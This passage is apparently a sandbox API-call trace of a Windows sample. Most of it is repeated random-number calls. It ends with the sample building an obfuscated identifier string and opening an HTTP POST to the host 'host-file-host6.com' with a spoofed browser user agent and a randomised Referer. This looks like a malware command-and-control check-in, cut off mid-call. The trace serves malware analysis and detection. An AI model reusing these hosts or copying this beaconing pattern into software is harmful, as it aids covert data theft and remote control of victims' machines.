out: Seed=0x540e9e) returned 0x24b1e888 [0134.382] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x128) returned 0x4a31890 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd82a6efe [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x12b64ca6 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x778c14c9 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe20bd23 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x94b796cf [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf7c0aba7 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7b57fb40 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5f68592 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc9675367 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc35e1088 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe979c22a [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x91b47559 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5a952919 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1636a6bc [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x71ff7d8a [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x150fb2dc [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x47aad690 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa4abc0bc [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1e03b960 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2ba226fa [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7c316c40 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5a67dd4c [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc683e73f [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x153492a0 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfb41589d [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbe480523 [0134.382] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x857223a0 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x15029425 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2e49b424 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcabc251f [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xeff623a1 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x32df9d0a [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4949b45e [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x51419509 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x17dae6c5 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbce03cef [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfcb96735 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x15196746 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbc8bd81d [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x953c8db3 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3357b741 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf8b41c96 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd950e71d [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x98f58fa2 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa609fad0 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x73b7efca [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf9848ed9 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xaa5bbced [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xeb820345 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbb78eefd [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x22acfe8b [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2340d052 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe3b724bd [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa246b6ca [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9adfebbd [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1c882be0 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xff9cf982 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2f9399f1 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x49581578 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x87e2a5a4 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x501976c9 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x60de2d5c [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6cc316b7 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x859f87c9 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb3057c74 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfd13382 [0134.383] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x19620598 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xee26bc1d [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6daaa656 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1f8062a2 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x547936de [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6d24342f [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9f322d19 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x597795b0 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x449ac11d [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6985233d [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x91240f47 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2a6705ef [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3cc2dd71 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe2c789ce [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x89627b71 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6c10f425 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1a01ace7 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1516e75d [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x19460845 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xef272f07 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xefc8bc02 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe906ae19 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd968c234 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x128cb51e [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4267942b [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x55852d45 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x50417181 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x772f5625 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x77d13c5e [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x852f3ced [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x276d4e3d [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdd6b5484 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd42b8bbf [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x289bb55c [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5d836c08 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x47124a0d [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8e0b9f75 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xaf27e003 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x71d5ab66 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x25724e58 [0134.384] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5fe7233b [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf74ef6e3 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe8c2b0c7 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcb683850 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa905711d [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfd550aef [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x28c2665a [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x415d7245 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x672611c3 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb2d438b2 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8c2a5de4 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6b2e8ec7 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x964f8983 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6f31e5be [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x519dda34 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe681d18 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x88266c2d [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x18d7dd19 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x91f50871 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x89feee05 [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb2e07a1d [0134.385] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6869c858 [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x56136232 [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe5fdaabd [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5809d898 [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8ecb6961 [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x479d30f4 [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc85b853a [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbd220dad [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xeddf6ed1 [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x418abd8c [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xed331279 [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8c8f8237 [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x278fb076 [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x147a740 [0134.388] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1ba12719 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x654f9602 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8ad17874 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x270d594c [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x12c62263 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x581b8c01 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd92f0d60 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb7b8116e [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb48b8fa8 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc54fcd95 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc1c6ecbf [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbb9da6f3 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdcb9af6 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x979cbdfb [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4e04ec3 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcc552a0 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb76242f5 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb5184bba [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xed8693a6 [0134.389] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xff3b59d6 [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x13916bac [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2988c6e9 [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7ccc6264 [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xfb97643b [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3cb27de2 [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7cac8060 [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe4dcfd74 [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3efa9f81 [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf06e5433 [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2427f414 [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcb6a2f04 [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb3c818bb [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5f9730f6 [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc68bc435 [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xef8e9ed [0134.390] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3a9554e0 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa255f02f [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1c6acecb [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x92d016b0 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x37ad5706 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x13cebe31 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x31be4117 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xde573d40 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x78a85662 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x909d91a9 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x301fd922 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x17a189c1 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x12eb4018 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x31ec30e0 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd25010d9 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcef204a1 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x65c4037b [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x82ac2d76 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7ca02094 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2ea6cec1 [0134.391] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb1787821 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7d8bde7a [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9f93f2f9 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x454138a3 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa3a636df [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x8cca8322 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x2dcc8153 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xdd59fc1 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe98b883f [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x53d45d4f [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x904b533f [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x23711e9e [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe810ecbd [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x75d2bb6 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd3586fd5 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xa152f3d1 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc74906b3 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x47abd5c3 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3b33ea15 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5c5ade92 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x97811edb [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x578585ad [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf12fe579 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4c65cc72 [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7d3e6f7f [0134.392] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x1baf1d76 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe6613243 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xecbde906 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc9f04b5c [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc9494af9 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc9031fb7 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcc926201 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe48021e0 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xac302cc1 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9bc235f8 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x13efd57 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xbdcb6a52 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xcea40001 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd9a4ba54 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xf1f3ab82 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x9046f8ac [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x7b10e296 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x147ff9da [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x89253fab [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xd9a85e3a [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xc055d465 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xee5fad2e [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x28b03d5d [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4f9d35de [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x5859e809 [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x6a0121ee [0134.393] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xda76eeff [0134.394] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x177) returned 0x4a319c0 [0134.394] lstrcatA (in: lpString1="", lpString2="FE7F15060B875FB9FB2A49F08D5D03120C287F38" | out: lpString1="FE7F15060B875FB9FB2A49F08D5D03120C287F38") returned="FE7F15060B875FB9FB2A49F08D5D03120C287F38" [0134.394] lstrcatA (in: lpString1="", lpString2="XC64ZB" | out: lpString1="XC64ZB") returned="XC64ZB" [0134.394] lstrcatA (in: lpString1="", lpString2="pub3" | out: lpString1="pub3") returned="pub3" [0134.394] lstrcatA (in: lpString1="", lpString2="UUll.Z!5:EqrD+1/kI/[!g8%rPULq86q?pt68uPph'PioC&JP`zk&1r;g$#?4SLLC?+L'/ORHGHRx\\$oTN:ddnMBi9Nn<4_ZnCNo+,*T/#lBrG\"P'htu)znuyExD^4._[^]FIARzsdB;oZA=74\"=k?N8BOx/sl]4;#LLB?M,NGPtrK,t@Pb'jIVDdb&+p@8?&af%exLz[d5.+J'5C5M`iD-:Ojo4]/f_,%q(L=0&jpq9&x/sl]4;#LLB?M,NGPtrK,t@Pb'jIVDdb&+p@8?&af%exLz[d5.+J'5C5M`iD-:Ojo4]/f_,%q(L=0&jpq9&x/sl]4;#LLB?M,NGPtrK,t@Pb'jIVDdb&+p@8?&af%exLz[d5.+J'5C5M`iD-:Ojo4]/f_,%q(L=0&jpq9&tHC?I#Ctm\\7`h>S2=iOR7z.@hFi;c7!D:ZF^1" | out: lpString1="JhQIx@r!A2=OTxFmOKNR9ob(=xSYV)F$)]sa5,iA@Ez6\"h;5UxWm`0CiG.I0?JPSSG:Am89&a$vGvQ`;>tHC?I#Ctm\\7`h>S2=iOR7z.@hFi;c7!D:ZF^1") returned="JhQIx@r!A2=OTxFmOKNR9ob(=xSYV)F$)]sa5,iA@Ez6\"h;5UxWm`0CiG.I0?JPSSG:Am89&a$vGvQ`;>tHC?I#Ctm\\7`h>S2=iOR7z.@hFi;c7!D:ZF^1" [0135.912] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10c) returned 0x4a33c40 [0135.912] lstrlenA (lpString="http://host-file-host6.com/") returned 27 [0135.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4a31840, cbMultiByte=28, lpWideCharStr=0x4a33c40, cchWideChar=56 | out: lpWideCharStr="http://host-file-host6.com/") returned 28 [0135.912] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0x101efae8 | out: pProxyConfig=0x101efae8) returned 1 [0135.965] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0xa1b0160 [0135.965] WinHttpCrackUrl (in: pwszUrl="http://host-file-host6.com/", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x101efba0 | out: lpUrlComponents=0x101efba0) returned 1 [0135.965] WinHttpConnect (hSession=0xa1b0160, pswzServerName="host-file-host6.com", nServerPort=0x50, dwReserved=0x0) returned 0xa2750f0 [0135.965] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x12) returned 0x4a33d60 [0135.965] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x68) returned 0x4a33d80 [0135.965] WinHttpOpenRequest (hConnect=0xa2750f0, pwszVerb="POST", pwszObjectName="/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0xa105830 [0135.965] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x4e) returned 0x4a33df0 [0135.965] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x10d) returned 0x4a33e50 [0135.965] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x4c8fc0f4 [0135.965] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x12) returned 0x4a33f70 [0135.965] RtlAllocateHeap (HeapHandle=0x4a30000, Flags=0x8, Size=0x17) returned 0x4a33f90 [0135.965] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x3ffe2d53 [0135.965] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x227b258f [0135.966] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x21a5494 [0135.966] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xb0de1d9c [0135.966] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xff445df1 [0135.966] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0xe53b5e95 [0135.966] RtlRandom (in: Seed=0x540e9e | out: Seed=0x540e9e) returned 0x71a28cfc [0135.966] wsprintfW (in: param_1=0x4a33e50, param_2="Accept: */*\r\nReferer: http://%S%s/" | out: param_1="Accept: */*\r\nReferer: http://muncbh.org/") returned 40 [0135.966] 